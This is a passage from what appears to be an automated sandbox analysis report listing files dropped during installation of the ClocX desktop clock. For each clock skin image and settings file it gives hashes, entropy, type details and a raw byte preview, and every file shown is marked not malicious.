File Type:	PC bitmap, Windows 3.x format, 117 x 118 x 24, resolution 2834 x 2834 px/m, cbSize 41592, bits offset 54
Category:	dropped
Size (bytes):	41592
Entropy (8bit):	6.224189134230555
Encrypted:	false
SSDEEP:	384:eXNleXJJIKo5QHHHHHHHHaHHHHHHHHHHHHh/+tMHHHHHHHHHHHHHHHHHHHHHHHHd:7XJJt0ZlN1uBaCAv1hEPWU3c
MD5:	12232B20B415DECC653B6BC5B9F0DDDD
SHA1:	E63540F2F7A39603DE5B4AA212690DBA028A2F42
SHA-256:	CDCAA8879D4B2C318F27CE0AB3048061A71E0F1050090BA53C54562D175DEB30
SHA-512:	6994257DA58D28A185DD212858EFA4D3C1CFC1CD57F1BE43C2693DDBDE2D688668C043798773CE933FBA202D74BAD0D6B90C6806A483AD6A99068CA938E0F3BD
Malicious:	false
Reputation:	unknown
Preview:	BMx.......6...(...u...v...........................................................................................................................................................................................{{zyywuttsrrrqqsrqqqqqqqsrquuswvuyxxzzy.......................................................................................................................................................................................................................................................................................................{{{vuuoonjjifedcaa^^][[ZYYXXWWWVVVVUWVVXWVXWV[ZX\[Z]\[a`_ddciiglkjqpputszzy.........................................................................................................................................................................................................................................................................\|\|\|ssrkkjddc_^]YXWUTSQPPNMLMKKKJJIIHHHFHFDHGEHFDHGEHGFIHGJHFKIHLKINNLQQOTTQXVUZXV]\Zba`ffemlkuut~}\|.................

C:\Program Files (x86)\ClocX\Presets\BlackAppleClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24027
Entropy (8bit):	7.908755071537191
Encrypted:	false
SSDEEP:	384:5fOprdUBSqoJzEJzpXqIVCiBZ75lAIy9Q/Z8RpzjLn6itBtIOe4HY85Y+KeFz:ROprKPezA1LVCiJTZ8RpvN+OemY2YGFz
MD5:	EBFD13181F171F5E71D710A6EA9F129B
SHA1:	E435734C679F3D7360B58498416703E63B41B699
SHA-256:	B30B748AAC01BCF421013976B3BA9DF1DA074077D35773624E5B2411D7E49B52
SHA-512:	BCD11A5F1861AFF7656F9FDB9D861CAE038A3A186C0B4163011C18702E687BC6988DB5C5F54F49774F38DFB2F42ECD925AADA31A0D423A615E52BAC82A1086DB
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..]QIDATx.b...?.(... ..F.`d....M.#......Z...(.fw..&b[.J$(..A4....R..x.....7..l...7x...\f`.\|.....RJ.(..8u..1.EQ`..@....R...1..s..T.".#..C`).:...g&..z.e.>........z~.....7.....6.[h..$.;.3.....o.8...;.!...F.....,$4.vFc.7...G(.N.^-A......{w..m....TU.0........Ia....f&Z.......DRz.NK7]X../1#....G.y..2.........h...q.....7....d..R...Q.V.. ..."..M..C.....9c...~....,..H!..4....v=;.8_.DG<.&.ue..@.CQX....-<.......^..Q..B...;l...{...:.\..8.4.$..;tn.R...M.%4j..v../,.4Fl.%g..J.Y.._....q.V...`...oc.9.....S.Z.....A,.p.'.z.O....""Z.._.4...#....L..f.F./.N..^^>->^.Sv.....k..=..@.....?L.?\|.........&..pM...X.E.?Pu..w&D../0........%4...._...F!AA36VV._.~....l,,_......%p....7??../.?..hm\|o........,..........&N..\:..`.Zr....Ei..X.[.=.{.7...z....4.<@.? ....(....$.....\|bgL'...L_..z[UK!....\ 5.x..W)ey.A.....A8....DR...@........m&..{.CH#...."...].K.!8;......f../..\|k.....S..!

C:\Program Files (x86)\ClocX\Presets\BlackBallRoman.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 129 x 129, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18261
Entropy (8bit):	7.972349901067941
Encrypted:	false
SSDEEP:	384:+RTsz18O1aVoTRG/gB3OySclWba32Z58aPY5I2YelngpOILTc/61ENvt:sm1TootG0Oy/WbqlFI0y1EBt
MD5:	732674A58E6E96725158AB71D39D1AF1
SHA1:	19E9FD5080FD624A0BA53C23BE8939166431FE55
SHA-256:	2B885590F9C5CD14ACCF5066E444EDEB4DD5A678A278401EBE60422E93EEFD18
SHA-512:	1C32055BD5ABCEC2E898D782E65DC2C31E289B874D964292974E94671173BAB2900D58CAAC1E4C58234381E680B03582E53FE1CDCCC24839D575BBC0A200691A
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............P....sRGB.........bKGD..............pHYs.................tIME..........U.. .IDATx..}yxT...}..$....6....-...V...~U....Oj...~V.....V\J.].l.Z.....P..M1,...Y&.Lf_..Y~.L.7..dA._.u.+...3....r?......M.6.Z[[.....].vM.w.......T..Q.i...S.$.a.....f.....f.1I..>........:4s...3f.h.2e..s.F...x..>s.9.\|....Y..... ....t:...f.0,...)..{EQd.....v......g.;..<..S..w.?._.W.^.a.3.[wZoo.a8.@.......E..,#..B.$.\|>.....r!.J.j.".L.j.BQ.D"...a(...0`..dY....'...M.`.X..f. =y.....\...3.\w..g7.G.>.c...O>.....;'...$.M..i !.$.......?......c.=.....f..Z...r.Z..d2lRu]...PU..@..`.....o.6o..;v ..BUU...Y.... ."$Ib......}..._\|...v.iM...#p\y.K........o..ba..."f....ttt.....D.........w..A..fC*....(....lA..(......@__..N'.0.........c.v....c.m....}.X,.d2.8q.kg.y.o.~..5.1.<.__?{....hH.d..n..N0n..F.W^1z{{.EQ..0.t:md.Y....8..S.I.....+.H$btww..h....4.......#......F[[....ktvv....0.............4:::.C......4:;;...n.......0.....+V.3g.4...$1....~?....O.......

C:\Program Files (x86)\ClocX\Presets\BlackClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 117 x 119 x 8, 1 compression, image size 6966, resolution 2898 x 2898 px/m, 256 important colors, cbSize 8044, bits offset 1078
Category:	dropped
Size (bytes):	8044
Entropy (8bit):	6.168405619029834
Encrypted:	false
SSDEEP:	192:xSaertTTPSCkul+KvKPq+guw3NVvY5WlHBHnaXO1Kuk5hVR:xeF6CLlraRw3Na56p5rk5hv
MD5:	99997471274B4A052F0BBDF11EF4D52B
SHA1:	C66163666A712ADED3981FC62F6545EE26B37FF8
SHA-256:	6EFA274E645CCE1483C678FD22DF195413037A95681788DD758C5BB99AA92418
SHA-512:	BD2B2CA3161FE9234E3BAAD6ADBA7BA15F025D6031804FBD7E80695B2B210786CBAD178DE9946A20B585D2D306D44E8089FFC83F52B7703E41E0093D555CB8BF
Malicious:	false
Reputation:	unknown
Preview:	BMl.......6...(...u...w...........6...R...R..................................................................................................................................................................................................................................................................................................................................................................................................................................................... ... ..."... ...$.. #.. ".. %..!&..#(..$(.!"". "$."$%.$%&. %).%%(.')+.#(..%)-.)).),.,-.--..%+0.&,0.-0.(-2.)/3..3...1.,/4.+03./01.04.-26./48.112.124.246.456.16:.468.17<.789.68:.38<.79<.59>.6;?.89:.:;<.9<>.<<=.6;@.8=B.=>@.:?D.>@B.;@E.<AE.?EI.@AB.ACE.CDD.DFG.AFI.FFH.EGJ.GGJ.AGL.EHJ.GHJ.FJK.CHM.DIM.IIJ.JJL.ILN.KLN.LNN.FLQ.HMQ.LNP.KPS.OQS.KPT.MRV.OTY.PQQ.QQT.PRT.RST.STU.TUV.QVZ.UVX.RW\.VXZ.SX\.TY].XYZ.YZ\.Y\].\]].W\`.Y]`.]^`.Y_d.Z`c.^`a.Z`d.\be._dg._di.`ab.bcd.cef.dde.`fi.dgk.fhk.ejn.hij.ikm.jlm.mnn.gkp.flp.hmq.mn

C:\Program Files (x86)\ClocX\Presets\BlueAppleClock.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	949
Entropy (8bit):	4.621169578246485
Encrypted:	false
SSDEEP:	24:BE/Drm5b7OmTORXFB01rfukpWdGm8bCi51Pgi:B2H0XCFK9MdGmQ71P3
MD5:	C01ED0B8CF60FB8904628B963D903FCD
SHA1:	80E751986DF1BD6272F172E7EC84CF7A6BD00DD9
SHA-256:	7F10E7820353E7422FA95F9523FC4A43DACEE60806B025F37FD733A7DC6598FB
SHA-512:	A818305CB3623CB4A23F35BA8E84ACBA9F46AA51EAB01791444A99D76507CB222752B3F92528F7E9282678C94D4F32E26CDCDC4671FA9A07D52713817DFC30B8
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFFFF5 ;cut window by this color (default red)..DisableAMPM=0 ;show AM/PM indicator (default 0)..AMPMColor=0x201010.;color of AM/PM indicator....HourColor=0x501A1A ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x501A1A ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....;CenterX=60 ;center point's X (default image_width / 2)..;CenterY=60 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\BlueAppleClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	28114
Entropy (8bit):	7.96802714586052
Encrypted:	false
SSDEEP:	384:5sCbXvMMC03YbV0tj3tx398ZUGY22JbWwlrFijLr+ZBmef/6/xRppPy8/b7zwkxF:/fMx03Oa+KtijLr+Hf/6JJ7zhxNJn+I
MD5:	674CF0106048DFE1BA8F9AFBC3840B48
SHA1:	7CB8AF5DB17DA0A779DE76CC96F4181F741B20EC
SHA-256:	03D0B14986DD3E58B69C15979712F323713EB11CCB095D9137A29C5A169199B2
SHA-512:	5F0B396E53070F471724487AC051C92F1732341741F917F840A070B38EF925122740E1DEB24F8807219718D1F6B51FCF1D8DFD2E38DC29542E1EE5EC9A770D5D
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..mHIDATx.b...?.(... .X...8...._...U..2..)2......73......(3..33.?F&... ........?&.S/........w...,..................Q... ....".....NK.#x.Ob..r.[.Q..s....i............... ..X.Z........B+S._2.AX....z..&..J.&q......c....Z. ...#p......].....@M..4..Atv.g.r'.8!.$.......o:j$D...D...Yv.5......i...lb..D,.z...I..e...,.Bzf.b....2...X...s.d..N......$.. ...E...E.[a.)...5.P..?O.....n4...Z.Va.s/..]...m.r.cG._[...e.)..x.....~..04../.U...xm.n...".x.......w3..Tu.....`..n....\R... :=.\|...E...........K.]..HDDC.g..Sd.M....... 0....I........vE.b..0Q>.T..rg.do=.......l$}....6'........s.=J.....^c.>F..`...t...h.ku:......f..kC.dm...L.Q..#Z..0[...A....h...DP...l"..b..l...........'...C..V...3C..JH...HZU.S0..K7+..-&..Fd.x..G...?.t....>'Iv?..O......E.....$a..;.9s..E.`.....Dw...u.Yc.........>&~...p>l.;.\|2.n61..2......W..O.+...0...\.4mQ.%.88uv......G.\|.g.I.A.]

C:\Program Files (x86)\ClocX\Presets\BlueBallOnlyDots.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	4.829360623424793
Encrypted:	false
SSDEEP:	24:BEarGXz5lrUBR6TO5fq10X7kpFg4SGIo8Ji4h3NPeibQ0Wd9iBxLuQI:BhqFlQfq1I4SGJmDPBQJTiBxLvI
MD5:	5ACC6F230EF671CD047E46010FFB5782
SHA1:	552172F52383E1C286E8B4C9D373165F511FEDA0
SHA-256:	420E912411E4CAC71F88F0485AD13D9AB40E513979C8C2E820B0BA70A1C9A843
SHA-512:	85D4388F35B93B0E82E4BB5BFFB56DA0A968EAAADC43B009A46F1F7FF03DE1CDA5BCCEDA0550424A86073F7F5DF49F36698E264DA9834BEB12139FD6A0877B32
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFF4FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font....HourColor=0x00BBFF ;color of hour hand..HourLength=37 ;length of hour hand..HourLap=-7 ;overlap of hour hand..HourWidth=4 ;width of hour hand....MinuteColor=0x00BBFF ;color of minute hand..MinuteLength=55 ;length of minute hand..MinuteLap=-7 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0xFFFFFF ;color of second hand..SecondLength=53 ;length of second hand..SecondLap=-49 ;overlap of second hand..SecondWidth=7 ;width of second hand.... ;CenterX=60 ;center point's X (default image_width / 2)

C:\Program Files (x86)\ClocX\Presets\BlueBallOnlyDots.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 129 x 129, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	25218
Entropy (8bit):	7.984811192664038
Encrypted:	false
SSDEEP:	768:86rfzS40W3RuiRp5F8IdXo0t0WyfrovfU+TnTC:8aG4PRlpUjWMMTC
MD5:	3DBECAC206657C42196EB6258B85F7A3
SHA1:	F496AF89CAD84D2C09EA0121BC3BD5C5690A09EC
SHA-256:	589112537079C34208B56E728B61FFFECC514D898D37E45A4039A1EBBE1E0261
SHA-512:	BA3388F7B35BA75FE93872AEE939CFD03DE554B2477B48AF61A553DEBFF5BABBEED35887FF4EA89E33AA22208AE242DDFA6EA52AAF91A486CAA49E61604FB47E
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............P....sRGB.........bKGD..............pHYs.................tIME....."0.4.M.. .IDATx..w.$gu..9o.........D2..0.`.8-.W......6..k..8.l/.AKt..".,.....!@....G..hF.o.TUo..Q.}....e.X.<.t..].u........yG.......r......~..7^....i.=..K>tL...m.e1......V..df..V.e...e.....V...9......!..z.I.O:.;.}..n)....s../..}_.G.x.c....>................=.P..id..7.h3...RA4..r..{.VJ..$:.....c.E..=;.g......;.`...f.....>..3...+....~.%.........n...../.......~..w?....o;.(%...^........T$.#...H?T.T.W..t..F+...Hq...~.TC.J....Hw..=......M.\|..}..ocO{...c./}.Y._.>.3.v.........,...+.>.}...g}.......p....g..{..F%mp=..F........[....w...&....cpp..}...%...3."\|.+_e.c..{71.i.E..E..J.&...E.t....{.\......w...?{.3.r...........p{..?............VQ......?@......c$.@7.......ZN=..r....@[C.V.V.+&..#.H.!..zCl..".E......w........o....H.)..u).ePTH....z.hm...........w_........e..\|......>w..Q..FQ..Kb.Iff)....w.?...Y<>e.......n..kn........e.x...B[...@...@....[Y\..0*...

C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1406
Entropy (8bit):	4.815875038770773
Encrypted:	false
SSDEEP:	24:BEarGXz5lrUBR6TO5P10X7kpFgIGIo8Jim03NPeibQ0Wd9iBxLuQI:BhqFlQP1IIGJoYPBQJTiBxLvI
MD5:	D7BC067BEB09EE29E2FF239B39DBC1FB
SHA1:	26B5B966EE8872A2CB2FD038A8D9448826E77AAB
SHA-256:	3796CF0105972A785F485135ED1429B778EC9A3549A24EAA2796035F1D84E9D8
SHA-512:	83D283768A574AEAE44D1A7506CB0C006CE1A5EC15425805D2883C8B7F499EA270F56E3673192681F31E97A4252239FFF75CCB42A3898D2259D152C379068098
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFF4FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font....HourColor=0x00BBFF ;color of hour hand..HourLength=37 ;length of hour hand..HourLap=5 ;overlap of hour hand..HourWidth=4 ;width of hour hand....MinuteColor=0x00BBFF ;color of minute hand..MinuteLength=55 ;length of minute hand..MinuteLap=7 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0xFFFFFF ;color of second hand..SecondLength=58 ;length of second hand..SecondLap=9 ;overlap of second hand..SecondWidth=2 ;width of second hand.... ;CenterX=60 ;center point's X (default image_width / 2).. ;

C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 129 x 129, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	26827
Entropy (8bit):	7.983277849645144
Encrypted:	false
SSDEEP:	384:+lAnQBTH+Yw2dXkWG+Tmd3mEw1p02I4Hl8bgFvJqdxtej9NgSBlhN7Qdl/2KnGgt:hQBr+YbFDG+TCvWrDFkdxto3HYiDaK+
MD5:	AD4C8EF01B22B7220BB0691E9C392705
SHA1:	B0A6835473DB5B3AAF5699450631BFF5A4204272
SHA-256:	15DD5FA2E9718DC6386E4B4620C1C1F173CE375604FD2D3D9C961F418051BB84
SHA-512:	0176E6F72D928DE575097BBF867B5AF17A0C0C649444D95C83470DC41CEB0B3BD30B1934AF2E661DCCC3D073EE0507F378E75C5798064A313C0A7A9D0F238577
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............P....sRGB.........bKGD..............pHYs.................tIME.....!%..ge.. .IDATx..y.dUy..y.....s.. 3.(rQ..c.\1..F.bL.jb..u.&j. .&.q..%.... ...2t....t7..>CM{Xk..........:...P{........_.q.G>9.....}..v.m.Y.Ht.)...o..<..U>.&.>...skc...&.j..{...k...6.8o.8a..;v.....O<..-.........y.s...x.....e.+...N~..<......t.{....a{rX........0(.....t..{..C.K.&....E....'.8..o.;g.\x.%.W.z..g0...;.W..........g<...6.....]s.eW\..k~...m...I7..7.{<.......X.......AJ")1.........^{.M.r...1%...#E.?..j5...9G.f.....~....7.....'..[~.cN<.g<.........?....,.z.:...\..o\|......H.1..].v...w8.4....[Q...&.>....c..b....U<..o.7...W..;;m..1......W^.5.....i.ZC..C.....`a\|.Q<I.y..T.QJ.y.../{.s.\|.O..s....m....?}.7_.....{..<...k......-:.i.......{...S.a+[\|.....!...0.hj..<."b.$4C...YC..t..$.....w..;...6.n.;....f.........$I...:.4.L`t..+^../...W}........M....'.t.%?...s._).nN(...8yVp....[.;....l.v/.S;......{..$'.{0?..9.b.e.. -....,1D..P.>!..y.Aa..,.

C:\Program Files (x86)\ClocX\Presets\BlueBallStd.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1412
Entropy (8bit):	4.835640392621879
Encrypted:	false
SSDEEP:	24:BEarGXz5lrUBR6TO5fq1rf7kpFg4SGIo8Gio403NPeibQ0Wd9iBxLuQI:BhqFlQfqeI4SGJ/4YPBQJTiBxLvI
MD5:	BB688C71A92147A2F5F7C60E9BFD6D4D
SHA1:	802183CBAF47321F3A9144F81C36AE4D8545D158
SHA-256:	610FB3556B3E858A233766FA9AF50057D41F6DBCBB15AC998A1DE733DE2F471B
SHA-512:	5D890BB00D5433141135AE6C2EA8764830BD500185DBDDBA064744BEFC8CDA027CF82B0B3EC22F5DCA9A3B46C6B16D529D60E24664324C9646D918E89E670ED7
Malicious:	false
Reputation:	unknown
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFF4FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font....HourColor=0x00BBFF ;color of hour hand..HourLength=37 ;length of hour hand..HourLap=-7 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x00BBFF ;color of minute hand..MinuteLength=55 ;length of minute hand..MinuteLap=-7 ;overlap of minute hand..MinuteWidth=3 ;width of minute hand....SecondColor=0x00553FFF ;color of second hand..SecondLength=58 ;length of second hand..SecondLap=-27 ;overlap of second hand..SecondWidth=2 ;width of second hand.... ;CenterX=60 ;center point's X (default image_width /

C:\Program Files (x86)\ClocX\Presets\BlueBallStd.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 129 x 129, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	28187
Entropy (8bit):	7.986090269080051
Encrypted:	false
SSDEEP:	768:MtXV8nMgM3Da9p/tp3bH73l8vAPt9k73YpH1:wV8VMalb7l8YPtS7oH1
MD5:	52B3B390690B8CC3D7E432F7AD26069E
SHA1:	2A777EDC8D78796291722EC5AD91FD036224DAAC
SHA-256:	BCDE729100D23631E527E126AC820E00B894D5CA0E2B1D11DFE13E2DA2045FFC
SHA-512:	01F670587E3E63D6CCD55B6007F76CD1265D2DF055759CB24E6EDA958E790D556A545054591E4BF3EF92FBB54320EF7CDC6E02E4ED1271B8054CFFC2A691A44E
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............P....sRGB.........bKGD..............pHYs.................tIME......-..... .IDATx..w.eey......n.9s.03.. "..P.FCD....hPy....F..$...6.(...J...@..g.f...9e....c.}......_.o..>{..k.......Y#..>>.....{.a?....~......<~..~....+....H....j.vq..i..n.djC..9.._{.]q....l_~..>t.......}...~..S^>..v....I.y.s.}.......r......}..v.. ..\|l%..C?.......7...-%..L..Sq.4cl<J<._.m#[';\...E...@.@k.c.>..{.8.w<..'..............r.!?...r.]/\.s....x..G!DM......sf'...<^r..1.......N;.u..{mBr...E..z..6.E..f..(.ML..vG.G~..?...wa.\|^o....~.!?{.._..'.t....).]~.5..s.?..U...5....hr.A..0.u+v....y..>.V......9l....l.p.]..._............$.....#p"\.._.h.^<..#..-!i.".t@......%.GH.....5J.>..L.}.._z../8..'..Y+.'.~.....w_..\q..]./(\...lf..h.vg....xD..=.9.....~...p........u......L...9.A`.....a...!I2.<..+W..W....{...G..+2.zHA..C.K7.(..}h.S[2.................o....+>....u.Mw.15.1Q.tR\|V...H.......u..+B6l.D{\|+..~.{Wo"1#<...s.>..w...9...T.G.s..6...@?M.4&.I..V...L..

C:\Program Files (x86)\ClocX\Presets\BlueSphere.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 123 x 123 x 24, resolution 2834 x 2834 px/m, cbSize 45812, bits offset 54
Category:	dropped
Size (bytes):	45812
Entropy (8bit):	6.813368700176925
Encrypted:	false
SSDEEP:	768:4JNtQgkxvPaaWTDWWzXSFzhVORp+8jYCzPlT/536x4:IgPaakXoLOdP55j
MD5:	D0F718A4EC8C75AF41446108FC6DADFD
SHA1:	4267134842903E2967A93896FD48A8CF92EA2A71
SHA-256:	3B78EEF71580D0D884FC53773A304A22C9C3AC007BC1F28AE182B7B153394713
SHA-512:	83098834C891F90FDA0D463F91E15CE6D4110379C53B994668E703F687E73247162CCF862BB284006EEE4393500DC978ED0AEA5BC395141F90481D0095EBA819
Malicious:	false
Reputation:	unknown
Preview:	BM........6...(...{...{........................................................................................................................................................................................zzzooodddZZZRRRLLLJJJIIIGGGGGGGGGGGGGGGHHHKKKKKKNNNUUU]]]gggrrr.........................................................................................................................................................................................................................................................................................................rrr^^^MMMGGGCCCFFFKKKTTT]]]hhhsss}}}..................}}}ssshhh\\\SSSLLLEEECCCFFFPPP```uuu..............................................................................................................................................................................................................................................................................~~~aaaLLL>>>AAAMMMaaa{{{.................................................

C:\Program Files (x86)\ClocX\Presets\BlueSphere.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	25942
Entropy (8bit):	7.955440909764544
Encrypted:	false
SSDEEP:	384:5gAXluiJgvL09fKPHmTCrKnehZk/Bl/a6dPipbz2J/ivEIs8fHF30X1OuaUol9:VlIvL09fKPGl/rbjcVmX1ZaH3
MD5:	E8B800502663E1DC178C8C7F20E4910B
SHA1:	67D4438F1114F2D66DE8082C06CE873E1B0977BC
SHA-256:	FC214D8533A48A7E6ACB73EA847484B4BA9D9591196612A63A803F71DFD1E5BA
SHA-512:	FAC04010538C6CC18993E2809937BE95719F54E208D9C21AB09AB1B511D0202D613FA443E0E34E29123D6C3C54FFCCC30156BAABBE13AF258BFDD93F1AC5CE39
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..d.IDATx.b...?.(... .....444.6n..\|..a._.2..:..?..R....`........ 6._..j.}.\|..E.;w.0yyy..p.. .^.0....;..;pzDBB..9..#........ ......LL.8...?.....q.7g.....3.[....!....4.....3..{.:.................H.aaa.....$..@%.@...............`......d....@...............e.=..... .}...?.vKKK3>}..?;;;#...2...@.>..s..y...l..P....[[[QKKKY`.V.F...hW.........p.17...@.......M........o....w.....s.X...&......,)......!555.---.>!...L..........]Bq.................0w..s......0.K..@#..(.....>..S`....x.l'.x....W..~...g.~BV...........=(..@....P^^.d...Pq........pY`d...w}`.LEMMM.(...,."..y...P.@.....!%./@\|....w......./^\.6"..K-..`mm.x...A....4(..........?..V.Z.vPtt4./_.xyyuLMMm.9.HEE..(%..! ......A...Q.H......?...6..f...N..R.l.R.x....:u..}.N...-nn..@6............9(..@.......L....jU...r>{.L.............@9.....D.............`... .A4.- w@K..@....@.`......@.\[.~..#G.l.

C:\Program Files (x86)\ClocX\Presets\BlueSphere2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	23821
Entropy (8bit):	7.947198931425243
Encrypted:	false
SSDEEP:	384:5jIsgmpetEnrsFb0gxMo2FHnRvS1VicSzk+U3Qa8FNvB7SrSDlE8LpwyTWEtJwJB:9IQpeMIMokvS1gxz83nq57YL80EtJwTr
MD5:	DAEB5B8E238848F28D9CB967DC211D2E
SHA1:	6672CACB53247FE0FDB4F68452B19A462BA2555D
SHA-256:	163836A57326CD517C89098265E5DCB0CF689C55A169E5B0B576565560951F70
SHA-512:	CEBF576DCCCA84314837AC80C3E89E68AC86E26DF51D31E3228A229D055E6EB6840842A3F1CB9D2B0A59794312A9FC3FA8B28DB6EE05A159CCEF51E46B05C85A
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..\.IDATx.b...?.(... ..F.`d...b....0a.#......6#.0........a.U.}}}.`.N.8.....Fx...0.w.!**..p.....U... ..J...A,..,.Z.."l....oM.fS..cXv.X..../.`......Cr.$.Hj.Gk..9.1..e;.`G....J)7.i.}.R.c.5...1(.9..'.R.r..{'....+.0......!...........N.._KK...I.....F..0r.xxx....D;::.988.Z..X..y... @a......_..=.?..g z.u.....<}...??..O.>}.&..""".......=...C.......).....D....I.))).s..;.T.KJJ..).....5uuu]..>..211.qh..vFd.c..?.6...,E@..7`x=..+.?..u...../...............4.K..W.^1L.<yP.0@.... ##...@YYY....G.....W.......3...6.be ..F:(....%V.~D.'1.f.&20F.......U.._.>.&....;.L..O.>}..../.5,]..)::zP.%..h.%...dP........;NLL.QGGG......(..6..@.....(...p.......+.......5 a........../^......g...q.....\.s..W."...&`..?0...@...A..@9.......a9..............,.......04.......`d0.".K..F.3@..0.. ......V....dx..A<z...e...V.g.o.~.f^uu5............4(......g........."....FFFN@9kUUU%`.."..

C:\Program Files (x86)\ClocX\Presets\Blue_sphere.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 121 x 121 x 24, resolution 2834 x 2834 px/m, cbSize 44100, bits offset 54
Category:	dropped
Size (bytes):	44100
Entropy (8bit):	6.3032945741088335
Encrypted:	false
SSDEEP:	768:5UgVAiVbt4DDDPywwDu5QQWdkMAlCy+eE8sN7qX3sUcQN:5vhMPad+loeE8rHzZN
MD5:	E7AA8136A3AB665606CF7C759A90B44D
SHA1:	8679DF46FF5F6A5AD64EF2C3942CFD3A6C0D6B6E
SHA-256:	038EDAC0FA25B8299B05657ACE4541DBF1363598D1992BA09003625751B58710
SHA-512:	BF23C2C51D744972CEFA56F6A464E84FD55BD4511DA1FC8EE336DAD7B233F8E09955A0F018B04F8F5E7AEFE60BA70CEFEC167BF68A0FB1B1ACB0FD1FC6C2027C
Malicious:	false
Reputation:	unknown
Preview:	BMD.......6...(...y...y....................................................................................................................................................................................................}}}xxxrrrlllkkkkkkkkklllqqqwwwzzz......................................................................................................................................................................................................................................................................................................................yyyhhhUUUJJJCCC>>>;;;:::???AAAEEEHHHKKKJJJFFFEEEAAA===<<<>>>AAAFFFRRReeewww.....................................................................................................................................................................................................................................................................................yyy]]]LLLBBB???HHHWWWgggwww................................................nnn\\\KKK@@

C:\Program Files (x86)\ClocX\Presets\BubbleClock.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	949
Entropy (8bit):	4.621730241023766
Encrypted:	false
SSDEEP:	24:BEsrm5b7OmTORXFB01rfukpWdGm8bCi51Pgi:BH0XCFK9MdGmQ71P3
MD5:	801B92A1950ED3E5A8CB847FA3AF0F23
